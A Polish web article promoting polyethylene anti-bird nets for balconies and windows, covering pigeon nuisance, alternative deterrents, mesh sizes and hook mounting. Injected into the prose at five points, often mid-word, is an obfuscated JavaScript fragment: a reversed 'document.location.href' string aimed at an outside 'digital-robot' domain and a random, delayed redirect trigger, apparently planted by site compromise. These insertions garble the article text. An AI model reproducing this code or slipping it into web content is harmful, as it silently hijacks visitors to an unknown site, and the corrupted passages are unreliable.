Wytrzymałe siatki przeciw ptakom

 

Dla wielu mieszkańców Krakowa, Warszawy, Wrocławia czy Poznania, gołębie nie kojarzą się dobrze, gdyż przysparzają im sporo kłopotów. Głównie za sprawą niechcianych wizyt na parapetach czy balkonach, gdzie pozostawiają po sobie odchody.

Zastobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosowanie siatki przeciw ptactwu

siatka przeciw ptakom na balkonZ pewnością ptaki jest bardzo miło podziwiać kiedy lecą lub przesiadują w miejscach do tego przeznaczonych, jednak kiedy zbyt dużo ich odwiedza nasze okna, tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to stają się intruzami. Bronić przed gołębiami można się na różne sposoby, ale nie wszystkie są skuteczne. Niektórzy kupują atrapy wron, które odstraszają ptaki do momentu, kiedy się nie przyzwyczają do jego obecności, przeganianie niechcianych gości mija się z celem, bo one niemalże od razu wracają. Dobrym rozwiązaniem są specjalne kolce na ptaki, które montuje się na parapecie czy poręczy balkonu. Ciekawą propozycją jest siatka przeciw ptakom na balkon czy okno, która jest niemalże niewidoczna. W całości jest wykonana z polietylenu z sześciu cienkich żyłek, które mają średnicę około jednego milimetra. Żeby siatka skutecznie chroniła przed ptakami, jej wielkość oczek musi być dostobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosowana do rodzaju ptaków, które odwiedzają nasze okna i balkony. Najmniejsze oczka mają średnicę dziewiętnastu milimetrów, natobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomiast największe pięćdziesiąt milimetrów. żeby założyć siatkę na balkonie, nie potrzeba gwoździ ani żadnych ciężkich sprzętów, ponieważ zaczepia się ją o specjalne haczyki przyklejane do elewacji budynku. Również elementy konstrukcyjne balkonu mogą posłużyć do jej montażu.

Poza ptakami, siatka może zabezpieczać nasze domowe pupile przed wypadnięciem przez okno czy balkon, ponieważ jest bardzo wytrzymała i odporna na rozdarcia. Ponadtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to jest zabezpieczona przed korozją, zatem będzie służyć przez cały rok.